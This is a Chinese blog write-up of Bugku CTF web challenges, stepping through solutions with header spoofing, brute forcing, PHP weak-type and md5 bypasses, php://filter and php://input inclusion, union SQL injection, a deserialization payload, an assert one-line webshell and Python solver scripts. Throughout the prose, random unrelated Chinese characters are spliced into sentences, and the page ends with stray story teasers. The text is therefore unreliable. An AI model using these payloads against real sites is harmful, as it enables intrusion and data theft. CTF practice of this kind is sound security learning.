Bugku Web Write up


title: Bugku Web Write up
date: 2019-04-07 11:07:19
tags:
- Bugku
- Web
categories:
- CTF
- Bugku
- Web


<center>Bugku平臺的Web題的Write up,差不多刷了一遍场斑,總結一下全蝶。</center>

前言

進度稍微延遲了這么一點他爸,本來是想著前天刷完,昨天寫B(tài)log。結果碰上最后幾個注入題龄毡,有點自閉,多搞了一點時間,導致進度一拖再拖荒勇,昨天又玩了一下午游戲無所作為。想著不能再拖了闻坚,必須今天寫掉沽翔,不然過幾天忘干凈了再寫就沒意義了。所以稍微少幾個題窿凤,以后再寫吧


直接從題目開寫吧仅偎,遇到相應知識再拓展。

基礎題

0x01 Web2

點進去一堆滑稽js腳本


image

結合題目描述:“聽說聰明的人都能找到答案” 雳殊,直接按F12橘沥。ctrl+F搜索flag,找到夯秃。

0x02 計算器

點進題目座咆,發(fā)現(xiàn)標題是隨機數(shù)字運算驗證碼。本來還以為是要利用Session仓洼,寫python腳本提交介陶。最后居然只是前端輸入框長度被限制。
所以打開F12色建,找到輸入框前端代碼哺呜,更改輸入框最大長度,再輸入表達式計算值箕戳,彈出flag


image

0x03 web基礎$_GET

點進去看到題目給了源碼某残。

image

只需構造get請求傳入what=flag即可。payload:http://123.206.87.240:8002/get/?what=flag
image

0x04 web基礎$_POST

點進去發(fā)現(xiàn)題目源碼漂羊。


image

與上題類似驾锰,不過是GET請求變成了POST,使用火狐插件hackbar或者其他類似插件構造post請求即可走越。


image

這里注意椭豫,不要直接用burp將GET改POST,親測無效旨指。如下圖示
  1. 不用hackbar正常的GET請求


    image
  2. 將GET直接修改成POST提交數(shù)據(jù)無效
    image

    這里據(jù)我個人分析赏酥,是因為直接改成POST后,服務器不知道接受的數(shù)據(jù)是什么類型谆构。所以得不到flag裸扶,于是在文件頭中加上Content-Type,得出了flag搬素,證明猜測是對的
  3. 文件頭加上Content-Type


    image

小小總結

以后需要改POST的還是直接用hackbar吧呵晨,233~

0x05 矛盾

點擊題目后闽坡,看到源碼

image

分析可知愚臀,需要GET傳入num為數(shù)字1才能輸出flag,但是如果輸入純數(shù)字的話,直接不滿足if條件掖棉,進不去if語句里面咙边,就輸出不了flag狐粱。
但是這里判斷num等于1拒啰,用的是==,而不是===胯舷,就用到了php弱類型比較刻蚯,即 1 == 1miracle是為true的。弱類型比較自行參照搜索引擎桑嘶。
于是可以構造payload:http://123.206.87.240:8002/get/index1.php?num=1miracle778
image

0x06 web3

題目描述為: flag就在這里快來找找吧
點擊題目去炊汹,彈了一個框說flag就在這里,來找找吧


image

一開始還沒想到flag藏的具體位置不翩,于是只能F12,看一下源碼及http文件頭兵扬。結果發(fā)現(xiàn)彈框的那段js代碼,如下圖,原來"在這里"的意思是說在js代碼里口蝠。


image

直接找到flag:
``

實體解碼即可得flag:KEY{J2sa42ahJK-HS11III}

0x07 你必須讓他停下

點擊題目去器钟,如下圖,頁面一直在刷新妙蔗,圖片也是不停更換


image

按照圖中頁面所述傲霸,本來以為要停在彈出一個熊貓的圖片的地方,結果在頁面出等了幾秒眉反,發(fā)現(xiàn)有些圖片根本不存在昙啄,只有這一張2333~
于是打開burp,看到訪問/里,jpg的名字隨機更換寸五,而且頁面響應的地方有一個flag is here梳凛,如下圖劃線處。


image

所以可以使用repeat一直按Go重放梳杏,直到出現(xiàn)flag為止韧拒。
image

0x08 文件包含

好像題目鏈接掛了。十性。叛溢。

0x09 變量1

點擊題目,看到源碼


image

分析一下劲适,可以看到var_dump那里出現(xiàn)$$,存在變量覆蓋楷掉,前面正則對args進行了過濾,只能輸入[a-z][0-9][A-Z]霞势。
因為存在變量覆蓋烹植,所以我們傳入args=GLOBALS,即可達到輸出$GLOBALS數(shù)組的目的斑鸦,GLOBALS為php的超全局變量,一個包含了全部變量的全局組合數(shù)組草雕。


image

0x10 web5

題目描述:JSPFUCK??????答案格式CTF{**}
點進題目并查看源碼鄙才,發(fā)現(xiàn)一堆js混淆過的jsfuck。


image

復制下來直接輸入F12控制臺即可得到flag促绵,再將ctf改為大寫即可


image

0x11 頭等艙

點進題目如圖,源代碼里也找不到啥東西


image

結合題目:頭等艙 猜測flag藏在http頭里
于是直接在響應的Headers里面找到


image

初級題

0x12 網(wǎng)站被黑

點進題目去,是一個如下圖示界面,源代碼嘴纺、HTTP頭都沒找到什么東西

image

結合題目意思败晴,網(wǎng)站被黑,說不定留下了什么后門栽渴。
于是用御劍(或者其他工具)掃一下后臺,發(fā)現(xiàn)shell.php
image

訪問一下尖坤,看到一個登錄框,隨便輸個密碼,出現(xiàn)如圖所警告
image

到這一步的話闲擦,沒有其他提示慢味,只能先通過萬能密碼看看能不能繞過登錄,不能的話再暴力破解
用萬能密碼繞過失敗墅冷,嘗試Burp暴力破解纯路,Burp暴力破解具體操作自行百度,或者參考我之前發(fā)的Dvwa暴力破解
暴力破解選擇simple list里的password字典進行爆破
image

得到密碼為hack
image

輸入密碼即可得flag

0x13 管理員系統(tǒng)

點進題目如圖示,使用萬能密碼測試登錄寞忿,提示說IP不允許訪問驰唬,聯(lián)系本地管理員登錄

image

于是添加XXF(X-Forwarded-For)=127.0.0.1進行登錄嘗試,提示說密碼不對
image

從上面嘗試知道腔彰,萬能密碼不管用叫编,所以密碼可能藏在某個地方(也是湊巧發(fā)現(xiàn)233~)
查看源代碼,發(fā)現(xiàn)有一行詭異的base64注釋霹抛,解碼可得內容為test123
image

于是用admin&test123進行登錄搓逾,同時添加XXF頭,得到flag
image

0x14 web4

題目如圖示

image

按提示查看源代碼杯拐,如圖發(fā)現(xiàn)一段被url編碼的js腳本
image

將這段代碼進行解碼霞篡,如圖示
image

通過閱讀源碼分析,只要在輸入框輸入67d709b2b54aa2aa648cf6e87a7114f1即可得到flag
image

0x15 flag在index里

題目如圖示

image

點擊鏈接后跳轉到如圖示地址
image

很明顯存在文件包含藕施,結合題目標題 flag在index里寇损,構造payload:http://123.206.87.240:8005/post/index.php?file=php://filter/read/convert.base64-encode/resource=index.php獲取index.php源碼
將獲取到的base64解碼后得到網(wǎng)頁源碼,找到flag
image

0x16 輸入密碼查看flag

題目如圖

image

很明顯,用Burp暴力破解,得到密碼為13579
image

輸入得flag:flag{bugku-baopo-hah}

0x17 點擊一百萬次

題目hints為:JavaScript
題目如圖裳食,每點擊這個圖片一次矛市,數(shù)量加1,當數(shù)量為100萬的時候出來flag


image

顯然诲祸,不可能為了一個flag浪費一個鼠標233~
結合題目給的hints浊吏,于是查看前端關于點擊的js代碼


image

分析可知而昨,點擊一次clicks加1,當clicks大于100萬的時候找田,提交一個表單歌憨,value等于clicks的值,所以我們直接POST提交clicks即可墩衙。
image

0x18 備份是個好習慣

點擊題目如圖示,出現(xiàn)一段hash編碼

image

乍一看還以為是md5务嫡,算了下長度,發(fā)現(xiàn)是64位漆改,但是前32位跟后32位是相同的心铃。感覺有點奇怪,于是把前32位md5解密一下挫剑,發(fā)現(xiàn)是個空密碼去扣。所以這段編碼估計是沒有什么用了。那應該怎么做呢?
題目描述是備份是個好習慣猜測可能是備份文件泄露漏洞樊破。于是訪問index.php.bak愉棱,可以下載。于是打開備份文件查看源碼
image

分析一下哲戚,這里代碼意思是奔滑,第11行獲取url ?及?后的字符串,第12行去除?,第13行剩下字符串中的key替代成'',第14行解析字符串,即將 key1=234&key2=123解析成key2=123惫恼。
到了這里就應該明白了档押,主要考察兩個點,第一是13行處祈纯,繞過str_replace令宿。繞過之后,來到第二處腕窥,md5弱類型比較粒没。
對于第一個點,可以使用雙寫繞過簇爆,第二個點的話癞松,可以利用兩個字符串md5都是0e開頭繞過,或者將key1 key2賦為兩個不同數(shù)組進行繞過(md5不能對數(shù)組進行操作入蛆,會返回null=null)

payload1: http://123.206.87.240:8002/web16/index.php?kekeyy1=QNKCDZO&kekeyy2=aabg7XSs

image

payload2: http://123.206.87.240:8002/web16/index.php?kekeyy1[]=1&kekeyy2[]=12
image

0x19 成績單

打開題目鏈接后,題目如圖示


image

簡單的輸入 1'响蓉、1'#測試后,發(fā)現(xiàn)存在sql注入漏洞哨毁,于是開始進行注入

  1. 用order by測試出有4個字段


    image
  2. union查看一下哪些字段可顯示


    image
  3. 爆表


    image
  4. 爆fl4g表的列


    image
  5. 爆flag值


    image

入門題

0x20 秋名山老司機

點進鏈接枫甲,題目如圖示


image

請在兩秒內計算車速,很明顯要用到python腳本。但計算出車速來應該怎么提交呢?于是多刷新幾遍,發(fā)現(xiàn)題目偶爾會變成下圖示想幻,里面講到了通過post提交參數(shù)value


image

于是寫一個python腳本
#!/usr/bin/env python3
# coding=UTF-8
'''
@Author: Miracle778
@LastEditors: Miracle778
@Description: file content
@Date: 2019-04-01 10:24:57
@LastEditTime: 2019-04-01 12:59:49
'''
import requests
from bs4 import BeautifulSoup

s = requests.Session()
r = s.get('http://123.206.87.240:8002/qiumingshan/')
soup = BeautifulSoup(r.text,'html.parser')
exp = soup.find_all('div')[0].string[:-3]
# print(exp)
value = {'value':eval(exp)}
r = s.post('http://123.206.87.240:8002/qiumingshan/',data=value)
print(r.text)

利用bs4提取表達式并計算粱栖。然后使用POST提交
運行腳本即可得flag

0x21 速度要快

題目點進去如圖示


image

沒找到別的信息。
用burp看一下http頭部跟頁面源碼脏毯,發(fā)現(xiàn)下圖示信息闹究。


image

上圖注釋信息說明需要POST提交參數(shù)margin的值,margin的值估計就是頭部中的flag食店。
將頭部中的flag base64解密一下得到如下信息
image

于是進行POST提交 margin=NDk4MDQ2,用火狐hackbar提交后渣淤,提示說不夠快


image

既然手工不夠快,那就用python跑一下吧吉嫩。
#!/usr/bin/env python
# coding=UTF-8
'''
@Author: Miracle778
@LastEditors: Miracle778
@Description: file content
@Date: 2019-04-01 13:06:09
@LastEditTime: 2019-04-04 20:48:35
'''
import requests
import base64

s = requests.Session()
r = s.get('http://123.206.87.240:8002/web6/')
flag_header = r.headers['flag'].encode('utf-8')
flag_message = base64.b64decode(flag_header).decode('utf-8')
tmp_list = flag_message.split(': ')
margin = base64.b64decode(tmp_list[-1].encode('utf-8')).decode()
data = {'margin':margin}

r = s.post("http://123.206.87.240:8002/web6/",data=data)
print(r.text)

跑一下砂代,出來結果


image

0x22 cookies欺騙

打開題目鏈接頁面如下


image

頁面一段字符,看上去也不像什么編碼率挣。于是找http頭部看看有沒有啥提示。但找了一圈并沒有發(fā)現(xiàn)露戒。
但是看到訪問url時椒功,發(fā)現(xiàn)有的貓膩,url兩個參數(shù)智什,一個line动漾、另一個filename,filename的值還用base64加密了一手荠锭。
于是將filename的值解密一下看看旱眯,解密結果為keys.txt。
直接訪問keys.txt看一下证九。與前面內容一樣


image

所以可以得出結論删豺,前面index.php的兩個參數(shù)line和filename可以用來讀取網(wǎng)頁源文件,于是將index.php用base64加密愧怜,line從0開始呀页,將index.php一行行讀出來。避免繁瑣拥坛,可以寫個python腳本蓬蝶。
#!/usr/bin/env python
# coding=UTF-8
'''
@Author: Miracle778
@LastEditors: Miracle778
@Description: 導出生成index.php
@Date: 2019-04-01 13:37:02
@LastEditTime: 2019-04-01 14:01:33
'''
import requests

url = 'http://123.206.87.240:8002/web11/index.php'

# url.format(2)
data = {'filename':'aW5kZXgucGhw'}
res = ''
# r = requests.get(url+'?line=100',params=data)
for i in range(100):
    data['line'] = i
    r = requests.get(url,params=data)
    if r.text == '':
        break
    res += r.text

f = open('./Bugku/Web/cookies欺騙/index.php','w')
f.write(res)
f.close

得到index.php源碼


image

由index.php源碼可知,只能通過filename讀取file_list數(shù)組里的文件猜惋,而如果想讀取keys.php的話丸氛,就需要構造cookie使得$_COOKIE['margin']=='margin'成立。
于是再寫一個python腳本著摔,添加上Cookie值缓窜,將keys.php再導出來

#!/usr/bin/env python
# coding=UTF-8
'''
@Author: Miracle778
@LastEditors: Miracle778
@Description: 導出keys.php
@Date: 2019-04-01 14:01:56
@LastEditTime: 2019-04-01 14:11:45
'''
import requests

url = 'http://123.206.87.240:8002/web11/index.php'
# 設置cookie不通過header
# header = {'Cookie':{"margin":"margin"}}
cookie = {'margin':'margin'}
data = {'filename':'a2V5cy5waHA='}
res = ''
for i in range(100):
    data['line'] = i
    r = requests.get(url,params=data,cookies=cookie)
    if r.text == '':
        break
    res += r.text
# print(res)
f = open('./Bugku/Web/cookies欺騙/keys.php','w')
f.write(res)
f.close

keys.php的源碼如下圖


image

得到flag

0x23 never give up

點進題目去,如圖示


image

流程走一遍,查看源碼及http頭雹洗,在源碼處發(fā)現(xiàn)提示:1p.html


image

訪問一下香罐,發(fā)現(xiàn)直接被重定向了。
于是只好查看1p.html的源代碼,發(fā)現(xiàn)一段編碼
image

解密后得到下面代碼

var Words ="<script>window.location.;</script> 
<!--JTIyJTNCaWYlMjglMjElMjRfR0VUJTVCJTI3aWQlMjclNUQlMjklMEElN0IlMEElMDloZWFkZXIlMjglMjdMb2NhdGlvbiUzQSUyMGhlbGxvLnBocCUzRmlkJTNEMSUyNyUyOSUzQiUwQSUwOWV4aXQlMjglMjklM0IlMEElN0QlMEElMjRpZCUzRCUyNF9HRVQlNUIlMjdpZCUyNyU1RCUzQiUwQSUyNGElM0QlMjRfR0VUJTVCJTI3YSUyNyU1RCUzQiUwQSUyNGIlM0QlMjRfR0VUJTVCJTI3YiUyNyU1RCUzQiUwQWlmJTI4c3RyaXBvcyUyOCUyNGElMkMlMjcuJTI3JTI5JTI5JTBBJTdCJTBBJTA5ZWNobyUyMCUyN25vJTIwbm8lMjBubyUyMG5vJTIwbm8lMjBubyUyMG5vJTI3JTNCJTBBJTA5cmV0dXJuJTIwJTNCJTBBJTdEJTBBJTI0ZGF0YSUyMCUzRCUyMEBmaWxlX2dldF9jb250ZW50cyUyOCUyNGElMkMlMjdyJTI3JTI5JTNCJTBBaWYlMjglMjRkYXRhJTNEJTNEJTIyYnVna3UlMjBpcyUyMGElMjBuaWNlJTIwcGxhdGVmb3JtJTIxJTIyJTIwYW5kJTIwJTI0aWQlM0QlM0QwJTIwYW5kJTIwc3RybGVuJTI4JTI0YiUyOSUzRTUlMjBhbmQlMjBlcmVnaSUyOCUyMjExMSUyMi5zdWJzdHIlMjglMjRiJTJDMCUyQzElMjklMkMlMjIxMTE0JTIyJTI5JTIwYW5kJTIwc3Vic3RyJTI4JTI0YiUyQzAlMkMxJTI5JTIxJTNENCUyOSUwQSU3QiUwQSUwOXJlcXVpcmUlMjglMjJmNGwyYTNnLnR4dCUyMiUyOSUzQiUwQSU3RCUwQWVsc2UlMEElN0IlMEElMDlwcmludCUyMCUyMm5ldmVyJTIwbmV2ZXIlMjBuZXZlciUyMGdpdmUlMjB1cCUyMCUyMSUyMSUyMSUyMiUzQiUwQSU3RCUwQSUwQSUwQSUzRiUzRQ==-->" 
function OutWord()
{
var NewWords;
NewWords = unescape(Words);
document.write(NewWords);
} 
OutWord();

其余代碼無關緊要时肿,作用就是進行重定向庇茫。真正有用的是<!--里這段base64編碼,將這段編碼先base64再url解碼得到下面代碼螃成。

";if(!$_GET['id'])
{
    header('Location: hello.php?id=1');
    exit();
}
$id=$_GET['id'];
$a=$_GET['a'];
$b=$_GET['b'];
if(stripos($a,'.'))
{
    echo 'no no no no no no no';
    return ;
}
$data = @file_get_contents($a,'r');
if($data=="bugku is a nice plateform!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)
{
    require("f4l2a3g.txt");
}
else
{
    print "never never never give up !!!";
}


?>

到這里就很明顯了旦签,傳入a,b,id三個參數(shù),分別滿足if條件即可
在這里寸宏,a利用的是文件包含宁炫,用php://input協(xié)議傳入數(shù)據(jù);b利用ereg函數(shù)的%00截斷以同時滿足eregi("111".substr(b,0,1),"1114") and substr(b,0,1)!=4這兩個矛盾點;還有一個id == 0容易被忽略,本來我以為直接id=0就能繞過氮凝,這個條件是不是太簡單了羔巢。后面發(fā)現(xiàn)id = 0的話,!$_GET['id']就滿足了罩阵,直接退出竿秆,根本就到不了后面,所以id還要利用一手php弱類型比較
所以最終payload為:
url: http://123.206.87.240:8006/test/hello.php?id=0miracle778&a=php://input&b=%001234566
post:bugku is a nice plateform!

image

當然也可以直接訪問f4l2a3g.txt,233

0x24 welcome to bugkuctf

點進題目去,F(xiàn)12審查一下元素

image

發(fā)現(xiàn)代碼阻肿,簡單審計后,發(fā)現(xiàn)可以文件包含匪燕。構造payload
url: http://123.206.87.240:8006/test1//test1/?txt=php://input&file=php://filter/read/convert.base64-encode/resource=hint.php
post: welcome to the bugkuctf
得到hint.php源碼

<?php  
  
class Flag{//flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("good");
        }  
    }  
}  
?>  

這里得到信息還是不夠完善,于是將上面payload中的file更改一下喧笔,將index.php源碼讀出來

<?php  
$txt = $_GET["txt"];  
$file = $_GET["file"];  
$password = $_GET["password"];  
  
if(isset($txt)&&(file_get_contents($txt,'r')==="welcome to the bugkuctf")){  
    echo "hello friend!<br>";  
    if(preg_match("/flag/",$file)){ 
        echo "不能現(xiàn)在就給你flag哦";
        exit();  
    }else{  
        include($file);   
        $password = unserialize($password);  
        echo $password;  
    }  
}else{  
    echo "you are not the number of bugku ! ";  
}  
  
?>  

由index.php代碼分析來看帽驯,flag應該藏在flag.php里,但是通過文件包含應該是出不來书闸,因為include前進行了一步正則匹配界拦,file參數(shù)值不能含flag,雙寫flag也沒能繞過去梗劫。

image

所以文件包含是得不到flag的享甸,往下看,發(fā)現(xiàn)password);終于第三個參數(shù)用到了梳侨。這里存在反序列化漏洞蛉威。具體參考:php反序列化漏洞
于是可以構造payload
url: http://123.206.87.240:8006/test1/?txt=php://input&file=hint.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
post: welcome to the bugkuctf
image

0x25 過狗一句話

題目描述:

<?php 
$poc="a#s#s#e#r#t"; 
$poc_1=explode("#",$poc); 
$poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; 
$poc_2($_GET['s']) 
?>

實際就是 assert($_GET['s']) 一句話木馬
所以可以傳入 s=cmd 進行命令執(zhí)行
于是構造 s=print_r(scandir('./')) 進行文件掃描。

image

看到一個flag_xx.txt
直接訪問即可
image

或者構造 s=print_r(readfile('./flag_sm1skla1.txt'))讀取


2019/4/8 更

0x26 字符走哺?正則蚯嫌?

題目鏈接進去,發(fā)現(xiàn)給了代碼,這就好辦了择示,把代碼看懂就好了束凑。

image

這里的意思是GET傳入id的值進行一個正則匹配,匹配的話就能得到flag栅盲。直接給個鏈接學一波PHP正則
構造符合條件的payload: keyAAkeyAAAAkey:/A/AAkeya@得到flag
image

0x27 login1(SKCTF)

題目hint說是 SQL約束攻擊
點進去看到是一個管理系統(tǒng)登錄框

image

試了下萬能密碼汪诉,發(fā)現(xiàn)繞不過去,然后發(fā)現(xiàn)有注冊功能谈秫,隨便注冊一個賬號扒寄,用注冊的賬號進行登錄,發(fā)現(xiàn)提示說不是管理員不能看flag
image

然后理所當然的去注冊admin賬號拟烫,不出意外的果然提示說admin已存在
image

我做的時候是沒有看到hint的该编,于是自然而然想是不是可以通過sql注入,注入update語句修改admin密碼硕淑,從而達到目的课竣。后面自然是失敗了。后面實在沒辦法置媳,只能去看看別人的WP了稠氮,結果才發(fā)現(xiàn)有hint,2333~,以后一定要仔細看題目半开。
那提示是說SQL約束攻擊,于是百度一下赃份。基于約束的SQL攻擊
使用'admin '做用戶名進行注冊登錄即可寂拆。
image

0x28 你從哪里來

題目進去是一句話 :are you from google?


image

很容易就聯(lián)想到更改http頭部,增加Referer


image

0x29 md5 collision(NUPT_CTF)

這個題目之前在南郵網(wǎng)絡攻防平臺上做過抓韩,不過那邊給了代碼纠永,這里代碼提示什么都沒給,只有一個please input a谒拴,有點尷尬尝江,這里雖然知道怎么做,但是還是不寫好了英上。

0x30 程序員本地網(wǎng)站

題目進去說請從本地訪問···


image

感覺有點瓜皮炭序,這題目做著做著又回到前面幾題簡單題一樣了。
直接修改XXF頭為127.0.0.1即可苍日。圖都懶得截了惭聂。

0x31 各種繞過

題目進去又給代碼。


image

分析一下相恃,id 可以url雙重編碼繞過辜纲,uname和passwd只能用sha1對數(shù)組操作返回Null來繞過了。
這里注意passwd使用post提交的,之前0x04的時候說過耕腾,post請求還是用hackbar提交吧见剩。
這里也是,用burp直接提交是得不到flag的扫俺。


image

還是要用hackbar提交一手
image

小小總結

新版火狐的hackbar也有個小缺點苍苞,就是post提交數(shù)據(jù)的時候,一定要有參數(shù)名牵舵,也就是說遇上php://input這種的話柒啤,Execute不動,post不了數(shù)據(jù)畸颅。
所以做個小總結担巩,遇見php://input用burp,遇見post name=value這種用hackbar没炒,遇見兩者皆有涛癌,那就用burp改GET為POST,手動加Content-Type。

0x32 web8

題目描述:txt送火?拳话??种吸?
題目進去又有代碼看

image

很明顯了弃衍,看到file_get_contents就要想到php://input
最后payload
url:http://123.206.87.240:8002/web8/?ac=Miracle778&fn=php://input
post:Miracle778
image

0x33 細心

題目描述:想辦法變成admin
題目進去如下圖

image

網(wǎng)頁源代碼及http頭找了一遍沒找到啥信息或提示
于是直接掃后臺吧。不過掃之前可以先試試robots.txt存不存在
這里是存在的坚俗,訪問一下看看,發(fā)現(xiàn)存在一個resusl.php
image

訪問一下镜盯,得到下圖頁面
image

看到 管理員、IP這兩個字猖败,都顧不得別的速缆,弄得我直接改XXF頭為127.0.0.1,然并卵恩闻,并無任何作用艺糜。后面仔細分析,看到那句代碼 if(password),感覺有點奇怪幢尚,這password鬼知道是誰破停。。后面回看一下題目尉剩,題目叫細心辱挥,描述說想辦法變成admin,么得辦法边涕,把admin當password提交一手晤碘,還真就爆出來flag了褂微。
image


分界線 今天就到這~~
擇日再更

最后編輯于
?著作權歸作者所有,轉載或內容合作請聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個濱河市园爷,隨后出現(xiàn)的幾起案子宠蚂,更是在濱河造成了極大的恐慌,老刑警劉巖童社,帶你破解...
    沈念sama閱讀 217,084評論 6 503
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件求厕,死亡現(xiàn)場離奇詭異,居然都是意外死亡扰楼,警方通過查閱死者的電腦和手機呀癣,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,623評論 3 392
  • 文/潘曉璐 我一進店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來弦赖,“玉大人项栏,你說我怎么就攤上這事〉攀” “怎么了沼沈?”我有些...
    開封第一講書人閱讀 163,450評論 0 353
  • 文/不壞的土叔 我叫張陵,是天一觀的道長币厕。 經(jīng)常有香客問我列另,道長,這世上最難降的妖魔是什么旦装? 我笑而不...
    開封第一講書人閱讀 58,322評論 1 293
  • 正文 為了忘掉前任页衙,我火速辦了婚禮,結果婚禮上阴绢,老公的妹妹穿的比我還像新娘店乐。我一直安慰自己,他們只是感情好旱函,可當我...
    茶點故事閱讀 67,370評論 6 390
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著描滔,像睡著了一般棒妨。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上含长,一...
    開封第一講書人閱讀 51,274評論 1 300
  • 那天券腔,我揣著相機與錄音,去河邊找鬼拘泞。 笑死纷纫,一個胖子當著我的面吹牛,可吹牛的內容都是我干的陪腌。 我是一名探鬼主播辱魁,決...
    沈念sama閱讀 40,126評論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼烟瞧,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了染簇?” 一聲冷哼從身側響起参滴,我...
    開封第一講書人閱讀 38,980評論 0 275
  • 序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎锻弓,沒想到半個月后砾赔,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 45,414評論 1 313
  • 正文 獨居荒郊野嶺守林人離奇死亡青灼,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內容為張勛視角 年9月15日...
    茶點故事閱讀 37,599評論 3 334
  • 正文 我和宋清朗相戀三年暴心,在試婚紗的時候發(fā)現(xiàn)自己被綠了。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片杂拨。...
    茶點故事閱讀 39,773評論 1 348
  • 序言:一個原本活蹦亂跳的男人離奇死亡专普,死狀恐怖,靈堂內的尸體忽然破棺而出扳躬,到底是詐尸還是另有隱情脆诉,我是刑警寧澤,帶...
    沈念sama閱讀 35,470評論 5 344
  • 正文 年R本政府宣布贷币,位于F島的核電站击胜,受9級特大地震影響,放射性物質發(fā)生泄漏役纹。R本人自食惡果不足惜偶摔,卻給世界環(huán)境...
    茶點故事閱讀 41,080評論 3 327
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望促脉。 院中可真熱鬧辰斋,春花似錦、人聲如沸瘸味。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,713評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽旁仿。三九已至藕夫,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間枯冈,已是汗流浹背毅贮。 一陣腳步聲響...
    開封第一講書人閱讀 32,852評論 1 269
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留尘奏,地道東北人滩褥。 一個月前我還...
    沈念sama閱讀 47,865評論 2 370
  • 正文 我出身青樓,卻偏偏與公主長得像炫加,于是被迫代替她去往敵國和親瑰煎。 傳聞我的和親對象是個殘疾皇子铺然,可洞房花燭夜當晚...
    茶點故事閱讀 44,689評論 2 354

推薦閱讀更多精彩內容

  • WEB2 看源代碼得flag 文件上傳測試 找一張圖片上傳,截包改后綴名為.php得flag 計算題 F12修改輸...
    a2dd56f6ad89閱讀 18,509評論 0 2
  • 本人純小白丢间,去CGCTF虐自己探熔,啥工具也不會,甚至連別人的write up都看不懂烘挫,一題百度一萬次诀艰,磕磕碰碰終于做...
    月小白白白白閱讀 1,594評論 0 1
  • 前兩天無意間翻到一個CTF平臺--BugKu,記下wp WEB 1.Web2 查看源代碼即可得到flag 2.計算...
    BerL1n閱讀 3,718評論 0 1
  • 抽空整理了一下CGCTF平臺的Web題的writeup。 0x01 簽到題(題目地址:http://chinal...
    ch3ckr閱讀 12,999評論 0 6
  • 了解身體的節(jié)律 1饮六、喚醒用日光其垄,睡覺用篝火 2、遠離藍光卤橄, 睡眠的四階段(R90绿满,一個周期醒一次,只不過你不記得)...
    在路上_ebd8閱讀 677評論 0 0